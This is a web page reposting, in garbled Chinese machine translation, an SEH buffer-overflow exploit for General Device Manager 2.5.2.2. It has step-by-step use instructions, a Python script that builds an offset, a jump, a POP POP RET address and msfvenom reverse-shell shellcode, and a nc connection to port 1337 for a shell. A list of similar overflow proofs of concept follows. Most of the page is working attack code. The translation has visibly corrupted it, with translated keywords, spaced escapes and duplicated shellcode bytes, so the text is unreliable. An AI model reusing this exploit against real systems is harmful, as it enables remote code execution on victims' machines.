通用设备管理器2.5.2.2-缓冲区溢出（SEH）

HackApt-37 Team · 04 9, 2025

＃利用标题:常规设备管理器2.5.2.2-缓冲区溢出（SEH）
＃日期: 30.07.2023
＃软件link: https://download.xm030.cn/d/mdawmda2ntq=
＃软件链接2:

正在加载...

www.maxiguvenlik.com

＃利用作者: ahmetümitBayram
＃测试版本: 2.5.2.2
＃测试在: Windows 10 64bit
＃1.-运行Python代码: Exploit.py
＃2.-打开pwned.txt并将所有内容复制到剪贴板
＃3.-打开设备管理并按添加设备
＃4.-将pwned.txt的内容粘贴到“ IP地址”中
＃5.-单击“确定”
＃6.- NC.EXE本地IP端口1337，您将拥有一个绑定的壳
＃7.- R.I.P.秃鹰3
导入结构
偏移=b'a' * 1308
nseh=b'\ xeb \ x06 \ x90 \ x90'＃jmp short
seh=struct.pack（'i'，0x10081827）＃0x10081827 : POP EBX＃POP ESI＃RET | ascii {page_execute_read} [netsdk.dll] aslr: false，rebase: false，safeseh: false，os: false，v4.0.8.66（v4.0.8.66（c:
nops=b'\ x90' * 32
＃shellCode: msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.0.1 lport=1337 exitfunc=thread -a x86 - platform windows -b'\ x00 \ x0a \ x0a \ x0a \ x0a \ x0d'-f python -f python -f python -var -var -name bessebscode
shellCode=b''
shellCode +=b'\ xd9 \ xc6 \ xbb \ xae \ xc7 \ xc7 \ xed \ x8e \ xd9 \ xd9 \ x74 \ x24 \ x24 \ xf4'
shellCode +=b'\ x5a \ x29 \ xc9 \ xb1 \ x52 \ x83 \ XEA \ XEA \ XFC \ x31 \ x31 \ x5a \ x13'
shellCode +=b'\ x03 \ xf4 \ xd4 \ x0f \ x7b \ xf4 \ x33 \ x33 \ x4d \ x84 \ x84 \ x04 \ xc4'
shellCode +=b'\ x32 \ x0c \ xe1 \ xf5 \ x72 \ x6a \ x62 \ x62 \ xa5 \ x42 \ x42 \ xf8 \ x26'
shellCode +=b'\ x4a \ x28 \ xac \ xd2 \ xd9 \ x5c \ x79 \ xd5 \ xd5 \ x6a \ x6a \ xea \ xea \ x5f'
shellCode +=b'\ xd8 \ x6b \ x47 \ xa3 \ x7b \ xe8 \ x9a \ x9a \ xf0 \ x5b \ x5b \ xd1 \ x54'
shellCode +=b'\ x05 \ x9a \ x16 \ x88 \ xe4 \ xce \ xcf \ xcf \ xc6 \ x5b \ x5b \ xfe \ x64'
shellCode +=b'\ x92 \ x67 \ x75 \ x36 \ x32 \ xe0 \ x6a \ x6a \ x8f \ x35 \ x35 \ xc1 \ x3d'
shellCode +=b'\ x9b \ x6f \ xc1 \ xbc \ x48 \ x04 \ x48 \ x48 \ xa6 \ x8d \ x8d \ x21 \ x02'
shellCode +=b'\ x5d \ x65 \ xdd \ x95 \ xb7 \ xb7 \ xb7 \ x1e \ x39 \ xf6 \ xf6 \ x77 \ x77 \ xed'
shellCode +=b'\ x43 \ x3f \ xbf \ x0e \ x36 \ x49 \ xc3 \ xb3 \ xb3 \ x41 \ x41 \ x8e \ xb9'
shellCode +=b'\ x6f \ xc7 \ x14 \ x19 \ xfb \ x7f \ x7f \ xf0 \ x9b \ x28 \ x28 \ x19 \ x73'
shellCode +=b'\ x97 \ x85 \ x6d \ xdb \ xb4 \ x18 \ xa1 \ xa1 \ x50 \ xc0 \ xc0 \ x91 \ x91 \ x44'
shellCode +=b'\ xb6 \ x40 \ xe1 \ x62 \ x12 \ x12 \ x08 \ xb1 \ x0b \ x0b \ x03 \ xf4 \ x14 \ x14'
shellCode +=b'\ x33 \ x53 \ x57 \ xc8 \ x91 \ x18 \ x7a \ x7a \ x1d \ xa8 \ xa8 \ x43 \ x13'
shellCode +=b'\ xd2 \ x81 \ x7b \ xe3 \ x7c \ x91 \ x91 \ x08 \ xd1 \ x23 \ x23 \ x09 \ x86'
shellCode +=b'\ x59 \ xab \ x97 \ x51 \ x9d \ x86 \ x60 \ x60 \ xcd \ x60 \ x60 \ x29 \ x91'
shellCode +=b'\ xc4 \ xa6 \ x7d \ xc1 \ x7e \ x0e \ x0e \ xfe \ x8a \ x7e \ x7e \ x7e \ xaf \ x2b'
shellCode +=b'\ x1c \ x2e \ x1f \ x84 \ xdd \ x9e \ xdf \ xdf \ x74 \ xb6 \ xb6 \ xf4 \ xef'
shellCode +=b'\ xab \ xa6 \ xf7 \ x25 \ xc4 \ xc4 \ x4d \ x02 \ xae \ x94 \ x94 \ x91 \ x91 \ x0c'
shellCode +=b'\ x2f \ x03 \ x90 \ x0c \ x2a \ XEA \ XEA \ X1D \ XEA \ XEA \ X5E \ X5E \ X1C \ X48'
shellCode +=b'\ xa5 \ xf6 \ x85 \ xd1 \ x3d \ x66 \ x49 \ x49 \ xcc \ x38 \ xa8 \ xa8 \ xc1'
shellCode +=b'\ xe3 \ xbd \ x67 \ x22 \ x89 \ xad \ xad \ x10 \ xc2 \ xc4 \ xc4 \ x8f \ xb7'
shellCode +=b'\ xdd \ xf2 \ xa7 \ x54 \ x4f \ x99 \ x37 \ x37 \ x12 \ x6c \ x6c \ x36 \ x60'
shellCode +=b'\ x73 \ x42 \ x4f \ xe4 \ x69 \ xfd \ xf9 \ xf9 \ x1a \ x70 \ x70 \ x9b \ xc2'
shellCode +=b'\ x9e \ xaf \ x58 \ xcc \ x1f \ x3d \ xe4 \ xe4 \ XEA \ x0f \ x0f \ xfb \ xe5'
shellCode +=b'\ xb6 \ x7b \ x53 \ xb0 \ x60 \ xd5 \ x15 \ x15 \ x6a \ xc3 \ xc3 \ x8f \ xcf \ xcf'
shellCode +=b'\ xc1 \ x8d \ x47 \ x89 \ x29 \ x0e \ x0e \ x11 \ x96 \ x67 \ x67 \ xf8 \ xf8 \ xfd'
shellCode +=b'\ x27 \ xde \ xbd \ x02 \ x87 \ xb6 \ x49 \ x49 \ x7b \ xf5 \ x26 \ x26 \ xb5'
shellCode +=b'\ x56 \ xbd \ x47 \ x54 \ x72 \ xc8 \ xc8 \ xef \ xc1 \ xc1 \ x17 \ x71 \ x71 \ x72'
shellCode +=b'\ xf2 \ xc2 \ xb6 \ x8b \ x71 \ xe6 \ x46 \ x46 \ x68 \ x69 \ x69 \ x83 \ x43'
shellCode +=b'\ x34 \ x2d \ x78 \ x3e \ x25 \ xd8 \ xd8 \ x7e \ xed \ xed \ x46 \ xc9'
final_payload=offset + nseh + seh + nops + shellCode
＃将最终有效载荷写入文件
TRY:
以F:为open（'pwned.txt'，'wb'）
print（'[+]创建％s字节邪恶有效载荷.'％len（final_payload））
F.Write（final_payload）
f.close（）
打印（'[+]文件创建！'）
Except:
打印（“无法创建文件！”）

H	raidenftpd 2.4.4005-缓冲区溢出（SEH） HackApt-37 Team 04 9, 2025 POC/?Day
H	Flexense HTTP服务器10.6.24-缓冲区溢出（DOS）（Metasploit） HackApt-37 Team 04 9, 2025 POC/?Day
H	LBT-T300-MINI1-远程缓冲区溢出 HackApt-37 Team 04 9, 2025 POC/?Day
H	Kitty 0.76.1.13-'开始重复的会话用户名'缓冲区溢出 HackApt-37 Team 04 9, 2025 POC/?Day
H	Kitty 0.76.1.13-'开始重复的会话主机名'缓冲区溢出 HackApt-37 Team 04 9, 2025 POC/?Day